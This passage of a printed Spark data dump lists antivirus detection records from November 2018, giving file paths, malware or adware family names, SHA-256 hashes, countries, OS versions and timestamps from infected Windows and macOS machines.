  Row(detection=Row(filename='ae1f6258f850536252fdabf95a804982e15b79664aed7475a2693fb567c13072', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\AE1F6258F850536252FDABF95A804982E15B79664AED7475A2693FB567C13072', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ae1f6258f850536252fdabf95a804982e15b79664aed7475a2693fb567c13072', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='150644-freeplay-final-rus-mafia2.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\Rar$DRa0.363\\150644-freeplay-final-rus-mafia2.exe', filesize=17600000, name='HEUR/AGEN.1005068.#M1.#R1'), hash='e505fa50dcf2719cbdded64b50eeb327bec87e8e6b3a30b2a3fffc14971a97d8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='dbc2cc85c7b2428bc599710f04dde93a0a0a6c994246d0df60e141d127a0113b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='partitionfindandmount.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\PartitionFindAndMount.exe", filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tdcelsxz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\TDcelsxZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204517-11278c25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7152e2eb\\AVSCAN-20181102-204456-04D489F3\\AVSCAN-20181102-204517-11278C25', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142548-f96a7a93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea537d61\\AVSCAN-20181102-142520-F4B57842\\AVSCAN-20181102-142548-F96A7A93', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090418-72ba64cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-090406-710B415A\\AVSCAN-20181102-090418-72BA64CC', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='F:\\Software\\Norton AntiVirus\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='9e94ec0106058c1fb2a512bd31e5cd25730dbb93dae4bdba4d2a32bdbb2bf5d2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-02T12:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plrkvyej.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\PLrKVYEJ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup (2).exe', filepath='C:\\Users\\X\\Downloads\\setup (2).exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T11:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsb1D9C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Download\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T18:57:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083308-c3a98427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1dae8533\\AVSCAN-20181102-082349-5BCE18B3\\AVSCAN-20181102-083308-C3A98427', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:33:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0hhvjrn2wnr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d54a', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d54a', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_10_9_1.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_10_9_1.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='8bf85c0c874f1b9b5b711de5aeb905943065a017bdb2e43f5ebfc1fe9c141b95', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-025625-f9f1f1b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-025625-F9F1F1B6', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsu1077.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T14:43:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='F:\\Backup\\LwD\\Praxis\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c379a71d8903b9ec14591bdb3e85716dcd3cbf55fef97fa614f787c2878b2b7a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\Tägliche Sicherung.buj\\\\\\" \\\\\\/force \\\\\\/hide \\\\\\/wait:3', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10482688, timestamp='2018-11-02T20:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3080'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:42:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ипо бгму.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\ИПО БГМУ.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062044-8b248834', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-062044-8B248834', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c912c273fb904f78f14f15381f38cd1f67c6e42e58904710324f4dc74002a916', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:03:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153028-e5edb35a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-153028-E5EDB35A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:30:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b1da', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b1da', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1944000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='ff12475016f687b5bdb8efd7278d78f73f45dae6fc2d31a7bf78bb690a294301', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T08:00:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e19b7f540ff4e9322d4e4e5c469083e1849e78ffe8c0179101b778e1c216a9bf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C3BEB124D478202777DBF55DCEB59BB06D75B07A597BCC3A040F208ACBC4A91E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:18:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150354-b46150fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150354-B46150FE', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='\\\\?\\C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='b300876e63f8503f36c89f0f9ffafc9b787a9cb8726ade185a054d9656a0d0d6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122343-004f03c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_75ba9890\\AVSCAN-20181104-122225-F3364FC7\\AVSCAN-20181104-122343-004F03C6', filesize=128000, name='Adware/Elex.fd567a.#M1.#R1'), hash='fd567a86a4cea46633d46a281c2792828d02e240ce8eebd3bc67fa45d8a22298', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:16:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\3582-490\\\\\\\\DfsdkS.exe\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T16:11:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153101-9451a04b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-153101-9451A04B', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:31:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153411-a95bfdb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-153411-A95BFDB1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f325037ca3c79c5dd0ada16881c59246e5044d1d1c165e93fd9c09b6d59a209c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:53:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FBA2075E58FEE279EE3132C341F2BA7CB69EF7CE2D4F6C7F1B94EAC024F7D1A5', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251f76', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251f76', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:36:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:51:36Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T23:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233634-5e282f0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233634-5E282F0F', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:35:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181239-372aedee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0a4534a\\AVSCAN-20181102-181203-32F2B3AB\\AVSCAN-20181102-181239-372AEDEE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160052-f2e503d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160052-F2E503D3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131131-7c5f90e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131131-7C5F90E0', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-13-32-57.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T10:55:16Z'), dt=datetime.date(2018, 11, 2)),
